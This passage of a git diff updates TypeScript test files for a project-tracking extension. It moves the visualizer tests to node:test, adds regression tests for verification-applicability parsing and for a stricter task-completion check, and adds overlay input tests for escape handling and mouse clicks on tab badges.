+test("isVerificationNotApplicable: whitespace-only is not applicable", () => {
+  assert.equal(isVerificationNotApplicable("   "), true);
+});
+
+// Positive cases: these SHOULD require verification
+test("isVerificationNotApplicable: 'Run load tests' requires verification", () => {
+  assert.equal(isVerificationNotApplicable("Run load tests"), false);
+});
+
+test("isVerificationNotApplicable: 'Verify API response times under load' requires verification", () => {
+  assert.equal(isVerificationNotApplicable("Verify API response times under load"), false);
+});
+
+test("isVerificationNotApplicable: 'Monitor error rates for 24h' requires verification", () => {
+  assert.equal(isVerificationNotApplicable("Monitor error rates for 24h"), false);
+});
+
+// Regression: #3634 — "Not provided." default from plan-milestone
+test("isVerificationNotApplicable: 'Not provided.' is not applicable (#3634)", () => {
+  assert.equal(isVerificationNotApplicable("Not provided."), true);
+});
+
+test("isVerificationNotApplicable: 'Not provided' (no period) is not applicable (#3634)", () => {
+  assert.equal(isVerificationNotApplicable("Not provided"), true);
+});
+
+test("isVerificationNotApplicable: trailing period does not defeat match (#3634)", () => {
+  assert.equal(isVerificationNotApplicable("None required."), true);
+  assert.equal(isVerificationNotApplicable("N/A."), true);
+  assert.equal(isVerificationNotApplicable("Not applicable."), true);
+});
diff --git a/src/resources/extensions/gsd/tests/verify-artifact-tightened.test.ts b/src/resources/extensions/gsd/tests/verify-artifact-tightened.test.ts
new file mode 100644
index 000000000..1a64299d2
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/verify-artifact-tightened.test.ts
@@ -0,0 +1,89 @@
+/**
+ * Regression test for #3607 — tighten verifyExpectedArtifact legacy branch
+ *
+ * The legacy (pre-migration) fallback in verifyExpectedArtifact previously
+ * accepted either a heading match (### T01 --) or a checked checkbox as proof
+ * that gsd_complete_task ran. A heading alone does not prove completion —
+ * it could result from a rogue write.
+ *
+ * The fix removes the hdRe heading regex and requires only a checked checkbox
+ * (cbRe) in the legacy branch, ensuring that only actual tool-completed tasks
+ * are treated as verified.
+ */
+
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { readFileSync } from 'node:fs'
+import { resolve } from 'node:path'
+
+const src = readFileSync(
+  resolve(process.cwd(), 'src', 'resources', 'extensions', 'gsd', 'auto-recovery.ts'),
+  'utf-8',
+)
+
+describe('verifyExpectedArtifact legacy branch tightened (#3607)', () => {
+  it('legacy branch does NOT define hdRe heading regex', () => {
+    // Find the legacy fallback section
+    const legacyIdx = src.indexOf('LEGACY: Pre-migration fallback')
+    assert.ok(legacyIdx !== -1, 'LEGACY comment must exist')
+
+    // Check the code within a reasonable window after the LEGACY comment
+    const legacyBlock = src.slice(legacyIdx, legacyIdx + 600)
+
+    assert.ok(
+      !legacyBlock.includes('hdRe'),
+      'hdRe heading regex must NOT exist in legacy branch — heading alone is not proof of completion',
+    )
+  })
+
+  it('legacy branch requires checked checkbox via cbRe', () => {
+    const legacyIdx = src.indexOf('LEGACY: Pre-migration fallback')
+    assert.ok(legacyIdx !== -1)
+
+    const legacyBlock = src.slice(legacyIdx, legacyIdx + 600)
+
+    assert.ok(
+      legacyBlock.includes('cbRe'),
+      'cbRe checked-checkbox regex must exist in legacy branch',
+    )
+
+    // cbRe must match checked checkboxes [x] or [X]
+    assert.ok(
+      legacyBlock.includes('[xX]'),
+      'cbRe must match both [x] and [X] checkbox variants',
+    )
+  })
+
+  it('legacy branch returns false when no plan file exists', () => {
+    const legacyIdx = src.indexOf('LEGACY: Pre-migration fallback')
+    assert.ok(legacyIdx !== -1)
+
+    const legacyBlock = src.slice(legacyIdx, legacyIdx + 1000)
+
+    // The else branch: no plan file means cannot verify
+    assert.ok(
+      legacyBlock.includes('no plan file'),
+      'missing plan file must be handled with return false',
+    )
+  })
+
+  it('DB available but task not found returns false', () => {
+    const legacyIdx = src.indexOf('LEGACY: Pre-migration fallback')
+    assert.ok(legacyIdx !== -1)
+
+    const legacyBlock = src.slice(legacyIdx, legacyIdx + 1000)
+
+    assert.ok(
+      legacyBlock.includes('DB available but task row not found'),
+      'must handle case where DB is available but task row is missing',
+    )
+
+    // The comment should be followed by a return false
+    const commentIdx = legacyBlock.indexOf('DB available but task row not found')
+    const afterComment = legacyBlock.slice(commentIdx, commentIdx + 200)
+    assert.ok(
+      afterComment.includes('return false'),
+      'missing task row when DB available must return false',
+    )
+  })
+})
diff --git a/src/resources/extensions/gsd/tests/visualizer-critical-path.test.ts b/src/resources/extensions/gsd/tests/visualizer-critical-path.test.ts
index 520e488fa..8abd48af4 100644
--- a/src/resources/extensions/gsd/tests/visualizer-critical-path.test.ts
+++ b/src/resources/extensions/gsd/tests/visualizer-critical-path.test.ts
@@ -3,9 +3,9 @@
 
 import { computeCriticalPath } from "../visualizer-data.js";
 import type { VisualizerMilestone } from "../visualizer-data.js";
-import { createTestContext } from "./test-helpers.ts";
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 function makeMs(id: string, status: "complete" | "active" | "pending", dependsOn: string[], slices: any[] = []): VisualizerMilestone {
   return { id, title: id, status, dependsOn, slices };
@@ -31,11 +31,11 @@ console.log("\n=== Critical Path: Linear Chain ===");
   ];
 
   const cp = computeCriticalPath(milestones);
-  assertTrue(cp.milestonePath.length > 0, "linear chain has critical path");
-  assertTrue(cp.milestonePath.includes("M002"), "M002 is on critical path");
-  assertTrue(cp.milestonePath.includes("M003"), "M003 is on critical path");
-  assertEq(cp.milestoneSlack.get("M002"), 0, "M002 has zero slack");
-  assertEq(cp.milestoneSlack.get("M003"), 0, "M003 has zero slack");
+  assert.ok(cp.milestonePath.length > 0, "linear chain has critical path");
+  assert.ok(cp.milestonePath.includes("M002"), "M002 is on critical path");
+  assert.ok(cp.milestonePath.includes("M003"), "M003 is on critical path");
+  assert.deepStrictEqual(cp.milestoneSlack.get("M002"), 0, "M002 has zero slack");
+  assert.deepStrictEqual(cp.milestoneSlack.get("M003"), 0, "M003 has zero slack");
 }
 
 // ─── Diamond DAG ────────────────────────────────────────────────────────────
@@ -60,14 +60,14 @@ console.log("\n=== Critical Path: Diamond DAG ===");
   ];
 
   const cp = computeCriticalPath(milestones);
-  assertTrue(cp.milestonePath.length >= 2, "diamond DAG has critical path");
+  assert.ok(cp.milestonePath.length >= 2, "diamond DAG has critical path");
   // M002 has weight 3 (3 incomplete), M003 has weight 1
   // Critical path should go through M002 (longer)
-  assertTrue(cp.milestonePath.includes("M002"), "M002 (heavier) is on critical path");
+  assert.ok(cp.milestonePath.includes("M002"), "M002 (heavier) is on critical path");
 
   // M003 should have non-zero slack since it's lighter
   const m003Slack = cp.milestoneSlack.get("M003") ?? -1;
-  assertTrue(m003Slack > 0, "M003 has positive slack (lighter branch)");
+  assert.ok(m003Slack > 0, "M003 has positive slack (lighter branch)");
 }
 
 // ─── Independent branches ───────────────────────────────────────────────────
@@ -83,9 +83,9 @@ console.log("\n=== Critical Path: Independent Branches ===");
   ];
 
   const cp = computeCriticalPath(milestones);
-  assertTrue(cp.milestonePath.length >= 1, "independent branches have at least one critical node");
+  assert.ok(cp.milestonePath.length >= 1, "independent branches have at least one critical node");
   // M002 has the most incomplete slices, should be critical
-  assertTrue(cp.milestonePath.includes("M002"), "M002 (longest) is on critical path");
+  assert.ok(cp.milestonePath.includes("M002"), "M002 (longest) is on critical path");
 }
 
 // ─── Slice-level critical path ──────────────────────────────────────────────
@@ -104,13 +104,13 @@ console.log("\n=== Critical Path: Slice-level ===");
   ];
 
   const cp = computeCriticalPath(milestones);
-  assertTrue(cp.slicePath.length > 0, "has slice-level critical path");
-  assertTrue(cp.slicePath.includes("S02"), "S02 is on slice critical path");
-  assertTrue(cp.slicePath.includes("S04"), "S04 is on slice critical path");
+  assert.ok(cp.slicePath.length > 0, "has slice-level critical path");
+  assert.ok(cp.slicePath.includes("S02"), "S02 is on slice critical path");
+  assert.ok(cp.slicePath.includes("S04"), "S04 is on slice critical path");
 
   // S03 should have non-zero slack (it's a shorter branch)
   const s03Slack = cp.sliceSlack.get("S03") ?? -1;
-  assertTrue(s03Slack > 0, "S03 has positive slack (shorter branch)");
+  assert.ok(s03Slack > 0, "S03 has positive slack (shorter branch)");
 }
 
 // ─── Empty milestones ───────────────────────────────────────────────────────
@@ -119,8 +119,8 @@ console.log("\n=== Critical Path: Empty ===");
 
 {
   const cp = computeCriticalPath([]);
-  assertEq(cp.milestonePath.length, 0, "empty milestones produce empty path");
-  assertEq(cp.slicePath.length, 0, "empty milestones produce empty slice path");
+  assert.deepStrictEqual(cp.milestonePath.length, 0, "empty milestones produce empty path");
+  assert.deepStrictEqual(cp.slicePath.length, 0, "empty milestones produce empty slice path");
 }
 
 // ─── Single milestone ───────────────────────────────────────────────────────
@@ -136,10 +136,8 @@ console.log("\n=== Critical Path: Single Milestone ===");
   ];
 
   const cp = computeCriticalPath(milestones);
-  assertTrue(cp.milestonePath.length === 1, "single milestone is its own critical path");
-  assertEq(cp.milestonePath[0], "M001", "M001 is the critical node");
+  assert.ok(cp.milestonePath.length === 1, "single milestone is its own critical path");
+  assert.deepStrictEqual(cp.milestonePath[0], "M001", "M001 is the critical node");
 }
 
 // ─── Report ─────────────────────────────────────────────────────────────────
-
-report();
diff --git a/src/resources/extensions/gsd/tests/visualizer-data.test.ts b/src/resources/extensions/gsd/tests/visualizer-data.test.ts
index 9f9548169..9881cdd04 100644
--- a/src/resources/extensions/gsd/tests/visualizer-data.test.ts
+++ b/src/resources/extensions/gsd/tests/visualizer-data.test.ts
@@ -4,10 +4,10 @@
 import { readFileSync } from "node:fs";
 import { join, dirname } from "node:path";
 import { fileURLToPath } from "node:url";
-import { createTestContext } from "./test-helpers.ts";
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
-const { assertTrue, report } = createTestContext();
 
 const dataPath = join(__dirname, "..", "visualizer-data.ts");
 const dataSrc = readFileSync(dataPath, "utf-8");
@@ -15,293 +15,293 @@ const dataSrc = readFileSync(dataPath, "utf-8");
 console.log("\n=== visualizer-data.ts source contracts ===");
 
 // Interface exports
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerData"),
   "exports VisualizerData interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerMilestone"),
   "exports VisualizerMilestone interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerSlice"),
   "exports VisualizerSlice interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerTask"),
   "exports VisualizerTask interface",
 );
 
 // New interfaces
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface CriticalPathInfo"),
   "exports CriticalPathInfo interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface AgentActivityInfo"),
   "exports AgentActivityInfo interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface ChangelogEntry"),
   "exports ChangelogEntry interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface ChangelogInfo"),
   "exports ChangelogInfo interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface SliceVerification"),
   "exports SliceVerification interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface KnowledgeInfo"),
   "exports KnowledgeInfo interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface CapturesInfo"),
   "exports CapturesInfo interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface HealthInfo"),
   "exports HealthInfo interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerDiscussionState"),
   "exports VisualizerDiscussionState interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export type DiscussionState"),
   "exports DiscussionState type",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerSliceRef"),
   "exports VisualizerSliceRef interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerSliceActivity"),
   "exports VisualizerSliceActivity interface",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export interface VisualizerStats"),
   "exports VisualizerStats interface",
 );
 
 // Function export
-assertTrue(
+assert.ok(
   dataSrc.includes("export async function loadVisualizerData"),
   "exports loadVisualizerData function",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("export function computeCriticalPath"),
   "exports computeCriticalPath function",
 );
 
 // Data source usage
-assertTrue(
+assert.ok(
   dataSrc.includes("deriveState"),
   "uses deriveState for state derivation",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("findMilestoneIds"),
   "uses findMilestoneIds to enumerate milestones",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("parseRoadmap"),
   "uses parseRoadmap for roadmap parsing",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("parsePlan"),
   "uses parsePlan for plan parsing",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("parseSummary"),
   "uses parseSummary for changelog parsing",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("getLedger"),
   "uses getLedger for in-memory metrics",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("loadLedgerFromDisk"),
   "uses loadLedgerFromDisk as fallback",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("getProjectTotals"),
   "uses getProjectTotals for aggregation",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("aggregateByPhase"),
   "uses aggregateByPhase",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("aggregateBySlice"),
   "uses aggregateBySlice",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("aggregateByModel"),
   "uses aggregateByModel",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("aggregateByTier"),
   "uses aggregateByTier",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("formatTierSavings"),
   "uses formatTierSavings",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("loadAllCaptures"),
   "uses loadAllCaptures",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("countPendingCaptures"),
   "uses countPendingCaptures",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("loadEffectiveGSDPreferences"),
   "uses loadEffectiveGSDPreferences",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("resolveGsdRootFile"),
   "uses resolveGsdRootFile for KNOWLEDGE path",
 );
 
 // Interface fields
-assertTrue(
+assert.ok(
   dataSrc.includes("dependsOn: string[]"),
   "VisualizerMilestone has dependsOn field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("depends: string[]"),
   "VisualizerSlice has depends field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("totals: ProjectTotals | null"),
   "VisualizerData has nullable totals",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("units: UnitMetrics[]"),
   "VisualizerData has units array",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("estimate?: string"),
   "VisualizerTask has optional estimate field",
 );
 
 // New data model fields
-assertTrue(
+assert.ok(
   dataSrc.includes("criticalPath: CriticalPathInfo"),
   "VisualizerData has criticalPath field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("remainingSliceCount: number"),
   "VisualizerData has remainingSliceCount field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("agentActivity: AgentActivityInfo | null"),
   "VisualizerData has agentActivity field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("changelog: ChangelogInfo"),
   "VisualizerData has changelog field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("sliceVerifications: SliceVerification[]"),
   "VisualizerData has sliceVerifications field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("knowledge: KnowledgeInfo"),
   "VisualizerData has knowledge field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("captures: CapturesInfo"),
   "VisualizerData has captures field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("health: HealthInfo"),
   "VisualizerData has health field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("stats: VisualizerStats"),
   "VisualizerData has stats field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("discussion: VisualizerDiscussionState[]"),
   "VisualizerData has discussion field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("loadDiscussionState"),
   "uses loadDiscussionState helper",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("buildVisualizerStats"),
   "uses buildVisualizerStats helper",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("byTier: TierAggregate[]"),
   "VisualizerData has byTier field",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("tierSavingsLine: string"),
   "VisualizerData has tierSavingsLine field",
 );
 
 // completedAt must be coerced to String() to handle YAML Date objects (issue #644)
-assertTrue(
+assert.ok(
   dataSrc.includes("String(summary.frontmatter.completed_at"),
   "completedAt assignment coerces to String() for YAML Date safety",
 );
 
-assertTrue(
+assert.ok(
   dataSrc.includes("String(b.completedAt") && dataSrc.includes("String(a.completedAt"),
   "changelog sort coerces completedAt to String() for YAML Date safety",
 );
@@ -312,112 +312,112 @@ const overlaySrc = readFileSync(overlayPath, "utf-8");
 
 console.log("\n=== visualizer-overlay.ts source contracts ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("export class GSDVisualizerOverlay"),
   "exports GSDVisualizerOverlay class",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("loadVisualizerData"),
   "overlay uses loadVisualizerData",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderProgressView"),
   "overlay delegates to renderProgressView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderDepsView"),
   "overlay delegates to renderDepsView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderMetricsView"),
   "overlay delegates to renderMetricsView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderTimelineView"),
   "overlay delegates to renderTimelineView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderAgentView"),
   "overlay delegates to renderAgentView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderChangelogView"),
   "overlay delegates to renderChangelogView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderExportView"),
   "overlay delegates to renderExportView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderKnowledgeView"),
   "overlay delegates to renderKnowledgeView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderCapturesView"),
   "overlay delegates to renderCapturesView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("renderHealthView"),
   "overlay delegates to renderHealthView",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("handleInput"),
   "overlay has handleInput method",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("dispose"),
   "overlay has dispose method",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("wrapInBox"),
   "overlay has wrapInBox helper",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("activeTab"),
   "overlay tracks active tab",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("scrollOffsets"),
   "overlay tracks per-tab scroll offsets",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("filterMode"),
   "overlay has filterMode state",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("filterText"),
   "overlay has filterText state",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("filterField"),
   "overlay has filterField state",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("TAB_COUNT"),
   "overlay defines TAB_COUNT",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("0 Export"),
   "overlay has 10 tab labels",
 );
@@ -428,19 +428,17 @@ const coreHandlerSrc = readFileSync(coreHandlerPath, "utf-8");
 
 console.log("\n=== commands/handlers/core.ts integration ===");
 
-assertTrue(
+assert.ok(
   coreHandlerSrc.includes('"visualize"'),
   "core.ts has visualize in subcommands array",
 );
 
-assertTrue(
+assert.ok(
   coreHandlerSrc.includes("GSDVisualizerOverlay"),
   "core.ts imports GSDVisualizerOverlay",
 );
 
-assertTrue(
+assert.ok(
   coreHandlerSrc.includes("handleVisualize"),
   "core.ts has handleVisualize handler",
 );
-
-report();
diff --git a/src/resources/extensions/gsd/tests/visualizer-overlay.test.ts b/src/resources/extensions/gsd/tests/visualizer-overlay.test.ts
index 13baf07e4..a0743679e 100644
--- a/src/resources/extensions/gsd/tests/visualizer-overlay.test.ts
+++ b/src/resources/extensions/gsd/tests/visualizer-overlay.test.ts
@@ -4,90 +4,90 @@
 import { readFileSync } from "node:fs";
 import { join, dirname } from "node:path";
 import { fileURLToPath } from "node:url";
-import { createTestContext } from "./test-helpers.ts";
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
-const { assertTrue, assertEq, report } = createTestContext();
 
 const overlaySrc = readFileSync(join(__dirname, "..", "visualizer-overlay.ts"), "utf-8");
 
 console.log("\n=== Overlay: Tab Configuration ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("TAB_COUNT = 10"),
   "TAB_COUNT is 10",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"1 Progress"'),
   "has Progress tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"2 Timeline"'),
   "has Timeline tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"3 Deps"'),
   "has Deps tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"5 Health"'),
   "has Health tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"6 Agent"'),
   "has Agent tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"7 Changes"'),
   "has Changes tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"8 Knowledge"'),
   "has Knowledge tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"9 Captures"'),
   "has Captures tab label",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"0 Export"'),
   "has Export tab label",
 );
 
 console.log("\n=== Overlay: Filter Mode ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('filterMode = false'),
   "filterMode initialized to false",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('filterText = ""'),
   "filterText initialized to empty string",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('filterField:'),
   "has filterField state",
 );
 
 // Filter mode entry via "/"
-assertTrue(
+assert.ok(
   overlaySrc.includes('data === "/"') || overlaySrc.includes("data === '/'"),
   "/ key enters filter mode",
 );
 
 // Filter field cycling via "f"
-assertTrue(
+assert.ok(
   overlaySrc.includes('data === "f"') || overlaySrc.includes("data === 'f'"),
   "f key cycles filter field",
 );
@@ -95,143 +95,200 @@ assertTrue(
 console.log("\n=== Overlay: Tab Switching ===");
 
 // Supports 1-9,0 keys
-assertTrue(
+assert.ok(
   overlaySrc.includes('"1234567890"'),
   "supports keys 1-9,0 for tab switching",
 );
 
 // Tab wraps with TAB_COUNT
-assertTrue(
+assert.ok(
   overlaySrc.includes("% TAB_COUNT"),
   "tab key wraps around TAB_COUNT",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('Key.shift("tab")') || overlaySrc.includes("Key.shift('tab')"),
   "supports Shift+Tab for reverse tab switching",
 );
 
 console.log("\n=== Overlay: Page/Half-Page Scroll ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("Key.pageUp"),
   "has Key.pageUp handler",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("Key.pageDown"),
   "has Key.pageDown handler",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('Key.ctrl("u")'),
   "has Ctrl+U half-page scroll",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('Key.ctrl("d")'),
   "has Ctrl+D half-page scroll",
 );
 
 console.log("\n=== Overlay: Mouse Support ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("parseSGRMouse"),
   "has parseSGRMouse method",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("?1003h"),
   "enables mouse tracking in constructor",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("?1003l"),
   "disables mouse tracking in dispose",
 );
 
 console.log("\n=== Overlay: Collapsible Milestones ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("collapsedMilestones"),
   "has collapsedMilestones state",
 );
 
 console.log("\n=== Overlay: Help Overlay ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("showHelp"),
   "has showHelp state",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('data === "?"'),
   "? key toggles help",
 );
 
 console.log("\n=== Overlay: Export Key Interception ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("activeTab === 9"),
   "export key handling checks for tab 0 (index 9)",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('handleExportKey'),
   "has handleExportKey method",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"m"') && overlaySrc.includes('"j"') && overlaySrc.includes('"s"'),
   "handles m, j, s keys for export",
 );
 
 console.log("\n=== Overlay: Footer ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("1-9,0"),
   "footer hint shows 1-9,0 tab range",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("PgUp/PgDn"),
   "footer hint mentions PgUp/PgDn",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes("? help"),
   "footer hint mentions ? for help",
 );
 
 console.log("\n=== Overlay: Scroll Offsets ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes(`new Array(TAB_COUNT).fill(0)`),
   "scroll offsets sized to TAB_COUNT",
 );
 
 console.log("\n=== Overlay: Terminal Resize Handling ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('resizeHandler'),
   "has resizeHandler property",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('"resize"'),
   "listens for resize events",
 );
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('removeListener("resize"'),
   "removes resize listener on dispose",
 );
 
 console.log("\n=== Overlay: Shared Imports ===");
 
-assertTrue(
+assert.ok(
   overlaySrc.includes('from "../shared/mod.js"'),
   "imports from shared barrel",
 );
 
-report();
+test("visualizer overlay closes on escape in filter and help submodes", async () => {
+  const mod = await import("../visualizer-overlay.js");
+
+  const mockTui = { requestRender: () => {} };
+  const mockTheme = {
+    fg: (_color: string, text: string) => text,
+    bold: (text: string) => text,
+  };
+
+  let closedFilter = false;
+  const filterOverlay = new mod.GSDVisualizerOverlay(
+    mockTui,
+    mockTheme as any,
+    () => { closedFilter = true; },
+  );
+  filterOverlay.filterMode = true;
+  filterOverlay.handleInput("\u0003");
+  assert.equal(closedFilter, true, "Ctrl+C closes while filter mode is active");
+  filterOverlay.dispose();
+
+  let closedHelp = false;
+  const helpOverlay = new mod.GSDVisualizerOverlay(
+    mockTui,
+    mockTheme as any,
+    () => { closedHelp = true; },
+  );
+  helpOverlay.showHelp = true;
+  helpOverlay.handleInput("\u001b");
+  assert.equal(closedHelp, true, "Escape closes while help overlay is visible");
+  helpOverlay.dispose();
+});
+
+test("visualizer overlay tab hitboxes include rendered badges", async () => {
+  const mod = await import("../visualizer-overlay.js");
+
+  const mockTui = { requestRender: () => {} };
+  const mockTheme = {
+    fg: (_color: string, text: string) => text,
+    bold: (text: string) => text,
+  };
+
+  const overlay = new mod.GSDVisualizerOverlay(
+    mockTui,
+    mockTheme as any,
+    () => {},
+  );
+  overlay.loading = true;
+  overlay.data = { captures: { pendingCount: 3 } } as any;
+
+  const lines = overlay.render(120);
+  const tabLine = lines.find((line: string) => line.includes("Captures") && line.includes("(3)"));
+  assert.ok(tabLine, "rendered tab bar includes captures badge");
+  const plain = tabLine!.replace(/\x1b\[[0-9;]*m/g, "");
+  const badgeColumn = plain.indexOf("(3)") + 2;
+  overlay.handleInput(`\x1b[<0;${badgeColumn};2M`);
+  assert.equal(overlay.activeTab, 8, "clicking the badge area selects the captures tab");
+  overlay.dispose();
+});
diff --git a/src/resources/extensions/gsd/tests/visualizer-views.test.ts b/src/resources/extensions/gsd/tests/visualizer-views.test.ts
index e899cd379..9286a6660 100644
--- a/src/resources/extensions/gsd/tests/visualizer-views.test.ts
+++ b/src/resources/extensions/gsd/tests/visualizer-views.test.ts
@@ -14,9 +14,9 @@ import {
   renderHealthView,
 } from "../visualizer-views.js";
 import type { VisualizerData } from "../visualizer-data.js";
-import { createTestContext } from "./test-helpers.ts";
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
 // ─── Mock theme ─────────────────────────────────────────────────────────────
 
@@ -165,19 +165,19 @@ console.log("\n=== renderProgressView ===");
   });
 
   const lines = renderProgressView(data, mockTheme, 80);
-  assertTrue(lines.length > 0, "progress view produces output");
-  assertTrue(lines.some(l => l.includes("M001")), "shows milestone M001");
-  assertTrue(lines.some(l => l.includes("S01")), "shows slice S01");
-  assertTrue(lines.some(l => l.includes("T01")), "shows task T01 for active slice");
-  assertTrue(lines.some(l => l.includes("M002")), "shows milestone M002");
-  assertTrue(lines.some(l => l.includes("depends on M001")), "shows dependency note");
-  assertTrue(lines.some(l => l.includes("30m")), "shows task estimate");
-  assertTrue(lines.some(l => l.includes("Feature Snapshot")), "shows stats header");
-  assertTrue(lines.some(l => l.includes("Missing slices")), "shows missing slices count");
-  assertTrue(lines.some(l => l.includes("State Engine")), "shows missing slice preview");
-  assertTrue(lines.some(l => l.includes("Updated (last 7 days)")), "shows updated count");
-  assertTrue(lines.some(l => l.includes("Recent completions")), "shows recent completions section");
